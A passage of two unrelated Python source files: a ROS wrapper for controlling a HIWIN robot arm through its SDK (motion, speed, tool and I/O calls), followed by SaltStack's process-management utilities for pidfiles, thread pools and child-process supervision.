self.robot_id = -1
self.name = name
self.CurrGoal = [0.0,36.8,11.35,-180,0,90]
self.positon = [0.0,36.8,11.35,-180,0,90]
self.Goal = [0.0,36.8,11.35,-180,0,90]
# Load the SDK
# Make sure the SKL library absolute file contains the file
assert os.path.exists(HRSDK_DLL_PATH), \
"HRSDK not found. Given path: {path}".format(path=HRSDK_DLL_PATH)
self.HRSDKLib = cdll.LoadLibrary(HRSDK_DLL_PATH)
try:
self.HRSDKLib.set_log_level(c_int(3))
except AttributeError:
pass
# Get the callback function
callback_type = CFUNCTYPE(None, c_uint16, c_uint16,
POINTER(c_uint16), c_int)
self.callback = callback_type(callback_function)
self.reconnecting = False # Used to know if we are trying to reconnect
self.__pub_threads = threading.Thread(target=self.__pub_robot_info)
self.__robot_info_pub = rospy.Publisher(
'robot/curr_info',
robot_info,
queue_size=1
)
self.__pub_threads.setDaemon(True)
self.__pub_threads.start()
def __pub_robot_info(self):
rate = rospy.Rate(10)
while not rospy.is_shutdown():
try:
msg = robot_info()
msg.curr_pose = self.Get_current_position()
_, msg.tool_coor = self.Get_tool_data()
# _, msg.base_coor = self.Get_base_data()
self.__robot_info_pub.publish(msg)
rate.sleep()
except KeyboardInterrupt:
break
def connect(self): # type: () -> bool
"""Connect to the Hiwin robot
:param
ip : Computer connect to robot (str)
level: Connection level (int)
:return
success: True if connection has succeeded, False otherwise (bool)
"""
self.robot_id = self.HRSDKLib.open_connection(self.ip, c_int(self.level),
self.callback)
if self.is_connected():
success = True
if self.level == 1:
# Initialize some parametes
# set operation mode to "Auto"
self.HRSDKLib.set_operation_mode(c_int(self.robot_id),
c_int(1))
self.HRSDKLib.set_override_ratio(c_int(self.robot_id),
c_int(10))
rospy.loginfo("HIWIN Robot '{}' successfully connected.".format(self.name))
else:
success = False
return success
def reconnect(self, trials=5, sec_between_trials=2.0):
# type: (int, float) -> bool
"""Try to reconnect to the robot. The ip and connection level for the
connection are taken from the ones given during __init__().
:param trials: Number of time to try to reconnect (int)
:param sec_between_trials: seconds to sleep between each trial (float)
:return success: True if correctly connected, False otherwise
"""
# Get the connection level
connection_level = self.get_connection_level()
# If robot is already connected with the correct level, nothing to do.
if connection_level == self.level:
success = True
return success
# If the robot is already reconnecting, do nothing
if self.reconnecting:
return False
self.reconnecting = True
# Try to reconnect to the robot
for trial in xrange(trials):
rospy.loginfo('Reconnecting to HIWIN robot "{robot_name}": '
'trial #{trial_num}.'.format(robot_name=self.name,
trial_num=trial+1))
# Connect to the robot
success = self.connect()
if success:
rospy.loginfo('Successfully reconnected with the robot!')
self.reconnecting = False
return success
else:
self.close()
# Retry after a while
time.sleep(sec_between_trials)
rospy.logwarn('Could not reconnect to robot "{robot_name}"! '
'Total trials: {trials_num}'
.format(robot_name=self.name, trials_num=trials))
self.reconnecting = False
return False
def close(self):
# type: () -> bool
"""Disconnect to robot
:return
Success: True if successfully disconnected, False otherwise
"""
error_id = self.HRSDKLib.close_connection(c_int(self.robot_id))
# If correctly disconnected error_id is equal to 0
if error_id == 0:
return True
else:
return False
def is_connected(self):
# type: () -> bool
"""Function to know if the robot is currently connected.
:return
is_connected: True if the robot is connected, False otherwise
"""
connection_level = self.get_connection_level()
# If connection_level is -1 it means that the robot is disconnected
is_connected = (connection_level == self.level)
return is_connected
def is_in_state(self, joints_states, angle_threshold=0.01):
# type: (list[float], float) -> bool
"""Check if the robot is in the given state (or close enough).
The robot is in the state if all the angles are the same as the given
joints states (allowing a optional angle_threshold)
:param joints_states: list of joints angles expressed in radians
:param angle_threshold: value (in radians) over which two angles are
considered different one to the other.
"""
success, current_joints_states = self.get_current_joints()
# For each joint of the robot
for current_joint_state, joint_state in zip(
current_joints_states, joints_states):
# Check if the current value is the same as the input one
if abs(current_joint_state-joint_state) >\
angle_threshold:
# One of the joints is not in the state input
return False # The robot is not in the given state
# All the joints of the
return True
# arm state whether idle
def is_in_idle(self):
# type: () -> bool
"""Tells whether the robot is in IDLE or not."""
robot_motion_state = self.get_robot_motion_state()
is_in_idle_state = (robot_motion_state == self.IDLE_MOTION_STATE)
return is_in_idle_state
# arm state whether busy
def is_running(self):
# type: () -> bool
"""Tells whether the robot is running (moving) or not."""
robot_motion_state = self.get_robot_motion_state()
is_running = (robot_motion_state == self.RUNNING_MOTION_STATE)
return is_running
def get_hrsdk_version(self):
# type: () -> (int, str)
"""Get HRSDK version
:return
error_id:
Success :0
Fail :else
version : HRSDK version (string)
"""
version = create_string_buffer(15)
error_id = self.HRSDKLib.get_HRSDK_version(version)
return error_id, version.value.decode("utf-8")
def get_connection_level(self):
# type: () -> int
"""Get user connect level to the robot
:return
Connection level:
Operator :0
Expert :1
"""
# TODO: Check if the robot is connected first
connection_level = self.HRSDKLib.get_connection_level(
c_int(self.robot_id))
return connection_level
def set_connection_level(self, level):
# type: (int) -> bool
"""Get user connect level
:parameter
level:
Operator :0
Expert :1
:return
bool:
True: success
False: failure
"""
result = self.HRSDKLib.set_control_level(c_int(self.robot_id),
c_int(level))
if result == level:
return True
elif result != level:
return False
# arm state return:
# 1:idle
# 2:motin
# 3:stop
# 4:delay
# 5:commend stay
# fail: alarm code -1
def get_robot_motion_state(self):
return self.HRSDKLib.get_motion_state(self.robot_id)
## PtP motion ABS
def Step_AbsPTPCmd(self, Pos, mode=0):
Pos_abs = AbsPostoGoal(Pos)
Pos_ctype = ctype_convert(Pos_abs)
self.HRSDKLib.ptp_pos(c_int(self.robot_id), c_int(mode),Pos_ctype)
## Line motion ABS
def Step_AbsLine_PosCmd(self, Pos, mode=0, smooth_value=0):
Pos_abs = AbsPostoGoal(Pos)
Pos_ctype = ctype_convert(Pos_abs)
self.HRSDKLib.lin_pos(c_int(self.robot_id), c_int(mode), c_int(smooth_value),Pos_ctype)
## PtP motion relate
def Step_RelPTPCmd(self, Pos_rel, mode=0):
Pos_rel = RelPosConvertGoal(Pos_rel)
Pos_ctype = ctype_convert(Pos_rel)
self.HRSDKLib.ptp_rel_pos(c_int(self.robot_id), c_int(mode),Pos_ctype)
## Line motion relate
def Step_RelLineCmd(self, Pos_rel, mode=0, smooth_value=0):
Pos_rel = RelPosConvertGoal(Pos_rel)
Pos_ctype = ctype_convert(Pos_rel)
self.HRSDKLib.lin_rel_pos(c_int(self.robot_id), c_int(mode), c_int(smooth_value),Pos_ctype)
def Stop_motion(self):
"""Stop the motion of the robot."""
self.HRSDKLib.motion_abort(self.robot_id)
def Continue_motion(self):
"""continue the motion of the robot."""
self.HRSDKLib.motion_continue(self.robot_id)
def Hold_motion(self):
"""Hold the motion of the robot."""
self.HRSDKLib.motion_hold(self.robot_id)
def Delay_motion(self,delay):
"""Delay the motion of the robot."""
self.HRSDKLib.motion_delay(self.robot_id,c_int(delay))
def Get_current_position(self):
Current_Pos = (c_double * 6)()
result = self.HRSDKLib.get_current_position(c_int(self.robot_id),Current_Pos)
#Current_Pos = float(Current_Pos)
value = [float(value) for value in (Current_Pos)]
value[0:3] = [ele/10 for ele in value[0:3]]
return value
#------set system variable
#set all arm speed
def Set_override_ratio(self,Speed):
self.HRSDKLib.set_override_ratio(c_int(self.robot_id), c_int(Speed))
#get all arm speed
def Get_override_ratio(self):
override_ratio = self.HRSDKLib.get_override_ratio(c_int(self.robot_id))
return override_ratio
#set all arm acceleration
def Set_acc_dec_ratio(self,acc):
self.HRSDKLib.set_acc_dec_ratio(c_int(self.robot_id), c_int(acc))
#get all arm acceleration
#only Auto mode can set the ratio of acceleration/deceleration
def Get_acc_dec_ratio(self):
acc_ratio = self.HRSDKLib.get_acc_dec_ratio(c_int(self.robot_id))
return acc_ratio
#set all arm acceleration time
def Set_acc_time(self,value):
self.HRSDKLib.set_acc_time(c_int(self.robot_id), c_int(value))
#get all arm acceleration time
def Get_acc_time(self):
acc_time = self.HRSDKLib.get_acc_time(c_int(self.robot_id))
return acc_time
#set arm PTP motion speed
def Set_ptp_speed(self,Speed):
self.HRSDKLib.set_ptp_speed(c_int(self.robot_id), c_int(Speed))
#get arm PTP motion speed
def Get_ptp_speed(self):
return self.HRSDKLib.get_ptp_speed(c_int(self.robot_id))
#set arm LINE motion speed
def Set_lin_speed(self,Speed):
return self.HRSDKLib.set_lin_speed(c_int(self.robot_id), c_double(Speed))
#get arm LINE motion speed
def Get_lin_speed(self):
return self.HRSDKLib.get_lin_speed(c_int(self.robot_id))
# arm back home motion
#only Manual mode can set
def Go_home(self):
self.HRSDKLib.jog_home(c_int(self.robot_id))
#jog stop
def Jog_stop(self):
self.HRSDKLib.jog_stop(c_int(self.robot_id))
# set robot base number
def Set_base_number(self,basenum):
self.HRSDKLib.set_base_number(c_int(self.robot_id),c_int(basenum))
def Get_base_number(self):
return self.HRSDKLib.get_base_number(c_int(self.robot_id))
# set robot base
def Define_base(self,basenum,Coor):
Coor_ctype = ctype_convert(Coor)
result = self.HRSDKLib.define_base(c_int(self.robot_id),c_int(basenum),Coor_ctype)
return result
# get robot base
def Get_base_data(self):
Coor = (c_double * 6)()
basenum = self.Get_base_number()
result = self.HRSDKLib.get_base_data(c_int(self.robot_id),c_int(basenum),Coor)
value = [float(value) for value in (Coor)]
value[0:3] = [ele/10 for ele in value[0:3]]
return result == 0, value
# set tool number
def Set_tool_number(self,toolnum):
self.HRSDKLib.set_tool_number(c_int(self.robot_id),c_int(toolnum))
# get tool number
def Get_tool_number(self):
return self.HRSDKLib.get_tool_number(c_int(self.robot_id))
def Define_tool(self,toolnum,Coor):
Coor_ctype = ctype_convert(Coor)
result = self.HRSDKLib.define_tool(c_int(self.robot_id),c_int(toolnum),Coor_ctype)
return result
def Get_tool_data(self):
Coor = (c_double * 6)()
toolnum = self.Get_tool_number()
result = self.HRSDKLib.get_tool_data(c_int(self.robot_id),c_int(toolnum),Coor)
value = [float(value) for value in (Coor)]
value[0:3] = [ele/10 for ele in value[0:3]]
return result == 0, value
# # Servo on: 1 Servo off: 0
def Set_motor_state(self, state):
self.HRSDKLib.set_motor_state(c_int(self.robot_id),c_int(state))
# get motor state
def Get_motor_state(self):
return self.HRSDKLib.get_motor_state(self.robot_id)
# Manual mode: 0 Auto mode: 1
def Set_operation_mode(self,mode):
self.HRSDKLib.set_operation_mode(c_int(self.robot_id),c_int(mode))
def Get_operation_mode(self):
return self.HRSDKLib.get_operation_mode(self.robot_id)
def Clear_alarm(self):
self.HRSDKLib.clear_alarm(c_int(self.robot_id))
# def Get_alarm_code(self):
# alarm_code = np.zeros(20,dtype=np.c_uint64)
# #alarm_code = np.uint64(alarm_code)
# #alarm_code = (c_uint64 * 20)()
# count = 20
# result = self.HRSDKLib.get_alarm_code(c_int(self.robot_id),c_int(count),alarm_code)
# return result == 0, [float(value) for value in (alarm_code)]
# I/O control
def Get_current_digital_inputs(self):
# type: () -> (list[int])
"""Get Robot current digital inputs.
:returns
inputs: list of the value of the digital inputs
(1 if on 0 if off)
"""
# If the robot is not connected, try reconnecting
if not self.is_connected():
successfully_reconnected = self.reconnect()
if not successfully_reconnected:
rospy.logwarn("Robot disconnected, it was not possible to get "
"the digital inputs")
return [-1 for _ in range(48)]
inputs = []
for i in range(1, 49):
inputs.append(self.HRSDKLib.get_digital_input(c_int(self.robot_id),
c_int(i)))
return inputs
def Get_current_digital_outputs(self):
# type: () -> (list[int])
"""Get Robot current digital outputs.
:returns
outputs: list of the value of the digital outputs
(1 if on 0 if off)
"""
# If the robot is not connected, try reconnecting
if not self.is_connected():
successfully_reconnected = self.reconnect()
if not successfully_reconnected:
rospy.logwarn("Robot disconnected, it was not possible to get "
"the digital outputs")
return [-1 for _ in range(48)]
outputs = []
for i in range(1, 49):
outputs.append(self.HRSDKLib.get_digital_output(c_int(self.robot_id),
c_int(i)))
return outputs
def Set_digital_output(self,index,value):
if not self.is_connected():
successfully_reconnected = self.reconnect()
if not successfully_reconnected:
rospy.logwarn("Robot disconnected, it was not possible to set "
"the digital outputs")
self.HRSDKLib.set_digital_output(c_int(self.robot_id), c_int(index),c_bool(value))
def Set_robot_output(self,index,value):
if not self.is_connected():
successfully_reconnected = self.reconnect()
if not successfully_reconnected:
rospy.logwarn("Robot disconnected, it was not possible to set "
"the digital outputs")
self.HRSDKLib.set_robot_output(c_int(self.robot_id), c_int(index),c_bool(value))
def Get_current_robot_outputs(self):
# type: () -> (list[int])
"""Get Robot current robot outputs.
:returns
outputs: list of the value of the robot outputs
(1 if on 0 if off)
"""
# If the robot is not connected, try reconnecting
if not self.is_connected():
successfully_reconnected = self.reconnect()
if not successfully_reconnected:
rospy.logwarn("Robot disconnected, it was not possible to get "
"the robot outputs")
return [-1 for _ in range(8)]
outputs = []
for i in range(1, 9):
outputs.append(self.HRSDKLib.get_robot_output(c_int(self.robot_id),
c_int(i)))
return outputs
def Get_current_robot_inputs(self):
# type: () -> (list[int])
"""Get Robot current digital inputs.
:returns
inputs: list of the value of the digital inputs
(1 if on 0 if off)
"""
# If the robot is not connected, try reconnecting
if not self.is_connected():
successfully_reconnected = self.reconnect()
if not successfully_reconnected:
rospy.logwarn("Robot disconnected, it was not possible to get "
"the digital inputs")
return [-1 for _ in range(8)]
inputs = []
for i in range(1, 9):
inputs.append(self.HRSDKLib.get_robot_input(c_int(self.robot_id),
c_int(i)))
return inputs
|
process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, with_statement
import copy
import os
import sys
import time
import errno
import types
import signal
import logging
import threading
import contextlib
import subprocess
import multiprocessing
import multiprocessing.util
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
import salt.log.setup
import salt.defaults.exitcodes
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
from tornado import gen
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def systemd_notify_call(action):
process = subprocess.Popen(['systemd-notify', action], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
if salt.utils.which('systemd-notify') and systemd_notify_call('--booted'):
return systemd_notify_call('--ready')
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except IndexError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def check_pidfile(pidfile):
'''
Determine if a pidfile has been written out
'''
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
'''
Return the pid from a pidfile as an integer
'''
with salt.utils.fopen(pidfile) as pdf:
pid = pdf.read()
return int(pid)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if isinstance(pid, six.string_types):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now this implementation
Only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
except AttributeError:
# During shutdown, `queue` may not have an `Empty` atttribute. Thusly,
# we have to catch a possible exception from our exception handler in
# order to avoid an unclean shutdown. Le sigh.
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
def add_process(self, tgt, args=None, kwargs=None, name=None):
'''
Create a processes and args + kwargs
This will deterimine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.is_windows():
# Need to ensure that 'log_queue' is correctly transfered to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
# create a nicer name for the debug log
if name is None:
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}{1}.{2}'.format(
tgt.__module__,
'.{0}'.format(tgt.__class__) if str(tgt.__class__) != "<type 'type'>" else '',
tgt.__name__,
)
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs, name=name)
if isinstance(process, SignalHandlingMultiprocessingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
if self._restart_processes is False:
return
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal_):
if (salt.utils.is_windows() and
signal_ in (signal.SIGTERM, signal.SIGINT)):
# On Windows, the subprocesses automatically have their signal
# handlers invoked. If you send one of these signals while the
# signal handler is running, it will kill the process where it
# is currently running and the signal handler will not finish.
# This will also break the process tree: children of killed
# children will become parentless and not findable when trying
# to kill the process tree (they don't inherit their parent's
# parent). Hence the 'MWorker' processes would be left over if
# the 'ReqServer' process is killed this way since 'taskkill'
# with the tree option will not be able to find them.
return
for pid in six.iterkeys(self._process_map.copy()):
try:
os.kill(pid, signal_)
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
# If it's not a "No such process" error, raise it
raise
# Otherwise, it's a dead process, remove it from the process map
del self._process_map[pid]
@gen.coroutine
def run(self, async=False):
'''
Load and start all available api modules
'''
log.debug('Process Manager starting!')
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# There are no SIGTERM handlers installed, install ours
signal.signal(signal.SIGTERM, self.kill_children)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# There are no SIGINT handlers installed, install ours
signal.signal(signal.SIGINT, self.kill_children)
while True:
log.trace('Process manager iteration')
try:
# in case someone died while we were waiting...
self.check_children()
# The event-based subprocesses management code was removed from here
# because os.wait() conflicts with the subprocesses management logic
# implemented in `multiprocessing` package. See #35480 for details.
if async:
yield gen.sleep(10)
else:
time.sleep(10)
if len(self._process_map) == 0:
break
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
except IOError as exc:
# IOError with errno of EINTR (4) may be raised
# when using time.sleep() on Windows.
if exc.errno != errno.EINTR:
raise
break
def check_children(self):
'''
Check the children once
'''
if self._restart_processes is True:
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
log.trace('Process restart of {0}'.format(pid))
self.restart_process(pid)
def kill_children(self, *args, **kwargs):
'''
Kill all of the children
'''
# first lets reset signal handlers to default one to prevent running this twice
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
if multiprocessing.current_process().name != 'MainProcess':
# Since the main process will kill subprocesses by tree,
# no need to do anything in the subprocesses.
# Sometimes, when both a subprocess and the main process
# call 'taskkill', it will leave a 'taskkill' zombie process.
# We want to avoid this.
return
with salt.utils.fopen(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Terminating pid {0}: {1}'.format(pid, p_map['Process']))
if args:
# escalate the signal to the process
try:
os.kill(pid, args[0])
except OSError:
pass
try:
p_map['Process'].terminate()
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
if not p_map['Process'].is_alive():
try:
del self._process_map[pid]
except KeyError:
# Race condition
pass
end_time = time.time() + self.wait_for_kill # when to die
log.trace('Waiting to kill process manager children')
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Joining pid {0}: {1}'.format(pid, p_map['Process']))
p_map['Process'].join(0)
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
# if any managed processes still remain to be handled, let's kill them
kill_iterations = 2
while kill_iterations >= 0:
kill_iterations -= 1
for pid, p_map in six.iteritems(self._process_map.copy()):
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
continue
log.trace('Killing pid {0}: {1}'.format(pid, p_map['Process']))
try:
os.kill(pid, signal.SIGKILL)
except OSError as exc:
log.exception(exc)
# in case the process has since decided to die, os.kill returns OSError
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
if self._process_map:
# Some processes disrespected the KILL signal!!!!
available_retries = kwargs.get('retry', 3)
if available_retries >= 0:
log.info(
'Some processes failed to respect the KILL signal: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.info('kill_children retries left: %s', available_retries)
kwargs['retry'] = available_retries - 1
return self.kill_children(*args, **kwargs)
else:
log.warning(
'Failed to kill the following processes: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.warning(
'Salt will either fail to terminate now or leave some '
'zombie processes behind'
)
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
def __new__(cls, *args, **kwargs):
instance = super(MultiprocessingProcess, cls).__new__(cls)
# Patch the run method at runtime because decorating the run method
# with a function with a similar behavior would be ignored once this
# class'es run method is overridden.
instance._original_run = instance.run
instance.run = instance._run
return instance
def __init__(self, *args, **kwargs):
if (salt.utils.is_windows() and
not hasattr(self, '_is_child') and
self.__setstate__.__code__ is
MultiprocessingProcess.__setstate__.__code__):
# On Windows, if a derived class hasn't defined __setstate__, that
# means the 'MultiprocessingProcess' version will be used. For this
# version, save a copy of the args and kwargs to use with its
# __setstate__ and __getstate__.
# We do this so that __init__ will be invoked on Windows in the
# child process so that a register_after_fork() equivalent will
# work on Windows. Note that this will only work if the derived
# class uses the exact same args and kwargs as this class. Hence
# this will also work for 'SignalHandlingMultiprocessingProcess'.
# However, many derived classes take params that they don't pass
# down (eg opts). Those classes need to override __setstate__ and
# __getstate__ themselves.
self._args_for_getstate = copy.copy(args)
self._kwargs_for_getstate = copy.copy(kwargs)
self.log_queue = kwargs.pop('log_queue', None)
if self.log_queue is None:
self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
else:
# Set the logging queue so that it can be retrieved later with
# salt.log.setup.get_multiprocessing_logging_queue().
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
# Call __init__ from 'multiprocessing.Process' only after removing
# 'log_queue' from kwargs.
super(MultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
# On Windows, the multiprocessing.Process object is reinitialized
# in the child process via the constructor. Due to this, methods
# such as ident() and is_alive() won't work properly. So we use
# our own creation '_is_child' for this purpose.
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_process_logging() directly.
self.__setup_process_logging()
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
else:
multiprocessing.util.register_after_fork(
self,
MultiprocessingProcess.__setup_process_logging
)
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
args = state['args']
kwargs = state['kwargs']
# This will invoke __init__ of the most derived class.
self.__init__(*args, **kwargs)
def __getstate__(self):
args = self._args_for_getstate
kwargs = self._kwargs_for_getstate
if 'log_queue' not in kwargs:
kwargs['log_queue'] = self.log_queue
# Remove the version of these in the parent process since
# they are no longer needed.
del self._args_for_getstate
del self._kwargs_for_getstate
return {'args': args,
'kwargs': kwargs}
def __setup_process_logging(self):
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
def _run(self):
try:
return self._original_run()
except SystemExit:
# These are handled by multiprocessing.Process._bootstrap()
raise
except Exception as exc:
log.error(
'An un-handled exception from the multiprocessing process '
'\'%s\' was caught:\n', self.name, exc_info=True)
# Re-raise the exception. multiprocessing.Process will write it to
# sys.stderr and set the proper exitcode and we have already logged
# it above.
raise
class SignalHandlingMultiprocessingProcess(MultiprocessingProcess):
def __init__(self, *args, **kwargs):
super(SignalHandlingMultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_signals() directly.
self.__setup_signals()
else:
multiprocessing.util.register_after_fork(
self,
SignalHandlingMultiprocessingProcess.__setup_signals
)
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
if HAS_PSUTIL:
process = psutil.Process(self.pid)
if hasattr(process, 'children'):
for child in process.children(recursive=True):
if child.is_running():
child.terminate()
sys.exit(salt.defaults.exitcodes.EX_OK)
def start(self):
